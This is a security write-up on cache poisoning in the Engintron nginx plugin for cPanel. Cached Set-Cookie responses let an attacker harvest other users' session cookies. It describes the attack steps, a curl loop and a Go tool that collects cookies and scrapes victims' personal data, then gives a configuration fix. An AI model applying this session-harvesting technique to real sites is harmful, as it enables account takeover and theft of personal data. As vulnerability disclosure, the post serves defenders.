- https://syst3mfailure.io/hotrod
- https://man7.org/linux/man-pages/man2/userfaultfd.2.html
- https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit
Dynamic caching: What could go wrong?
Tl;Dr
The Engintron plugin for CPanel presents a default configuration which could expose applications to account takeover and / or sensitive data exposure due to cache poisoning attacks.
Whenever a client sends a request to a web server, the received response is processed and served by the back-end service each time.

In case of an high traffic volume, this behavior could generate a server overload, resulting in service performance issues. To solve this problem, reverse proxies implements mechanisms such as the web cache. When a user sends a request to a reverse proxy, the nginx core module will first check if a valid response is available in its caching storage. if no valid response is found, the original client request is then forwarded to the webserver, and the response is stored for future use before being send back to the client.
When another user will request the same resource, the nginx core will serve the response stored in the cache, instead of forwarding the request to the backend server, resulting in a much more fluent browsing for the client.

Once the cache time is expired, the cached response is deleted. When another user request the same resource, the flow starts again by getting a new response from the webserver, storing it in the cache and so on.

Web-cache is also a complex mechanism which could easily be misconfigured, resulting in a wide variety of attack vectors.
Finding the bug
Engintron is an Nginx implementation for CPanel, which comes with some pre-enabled advanced functionalities, such as a micro-caching service for dynamic HTML content.


This caching service allows the storage of dynamic HTML responses in the cache for 1 second. To avoid caching responses containing sensitive information, the application avoids caching responses for requests carrying cookies or urls with some common prefix


The cache key is set to $MOBILE$scheme$host$request_uri
, meaning that two users sending a request to the same URL could receive the same responses.
Attack scenario
Scenario: A small webapplication used to send personal information for a candidacy, hosted by an Apache Web Server behind Nginx and running on a CPanel instance. The Nginx implementation is handled with the plugin “Engintron”.
Session handling is required, as the application allows to resume the candidacy later on by using a password set during the initial submission.
The first step requires some basic personal information, an email address and a password.

The email and the password can be used to resume the candidacy later on.

When submitting this form, the backend writes the provided information into a temporary file, and the client gets redirected to the second step.

After a redirect to step2.php, some additional information are required, before being able to submit the final candidacy.

When the form gets submitted the temporary file is deleted, and the session is discarded as not useful anymore.
The attack
the response where the session cookie is being set is not handling cache control, exposing the application to some sort of web-cache poisoning attack, which would lead to account takeovers and sensitive data disclosure.
As mentioned at the beginning of this article, Engintron presents a micro-caching service which holds dynamic HTML resources in the reverse proxy cache for 1 second. Let’s analyze some responses:

A legitimate request carrying the set “session-cookie” results in the Engintron cache being ignored. To verify this it is possible to send several requests in a short period of time, looking for discrepances in the responses, or for some header containing cache directives, such as “X-Nginx-Upstream-Cache-Status”. In this case, the cache-status header explicitly declare a bypass of the cached context.
Using the Burpsuite intruder we can send the request 100 times in a short period of time to verify it

and as expected, there is no difference in any of the responses

This happens because the “session-cookie” cookie matches the engintron regex and prevents caching of private responses.
To get a cached response we have to provide a request which does not get validated by any of the Engintron cache bypass conditions.
This is possible simply by removing the Cookie header from the request.

The cached response contained a really interesting header: “Set-Cookie”. This header is setting the session-cookie value for the current user, identifying a session.
By sending the request twice in the same second, we would get the same set-cookie header.
To verify this, we can wrap a curl command in a while loop and observe that multiple responses are carrying the same value.

Because of this, an attacker could automate the process of retrieving valid session cookies from the cached context, and try to use them to retrieve user sensitive information before he submits the final form.
To perform this attack I’ve built a small tool written in GO.
Please excuse me for my bad code writing skill, I will try to explain the relevant parts of the exploit code.
The exploit starts a thread which collects a new cookie for each second, storing it in a JSON file

The cookie struct is holding the cookie value, how many times it got used by the script (Count), and if it got used to retrieve sensitive information (Consumed).

the JSON file looks like this

While the first thread collects cookies, a second thread is spawned to collect any new sensitive data associated with the stolen sessions.

When the “mydata.php” page content length is greater then 933, it means that some data has been stored, and in that case a copy of the response would get saved.
Follows a video showing a proof of concept of the mentioned exploit
This kind of application logic is common in many scenarios such as job candidacies. The impact of this issue highly depends on the kind of data processed by the application.
Another thing to note is that detecting attacks like this would be really difficult, as the generated traffic would look legit.
Remediation
As a workaround for this issue it is recommended to disable the dynamic cache service from Engintron. To do this, it is necessary to comment the line 53 in the configuration file located at /etc/nginx/common_http.conf

-
There are no more articles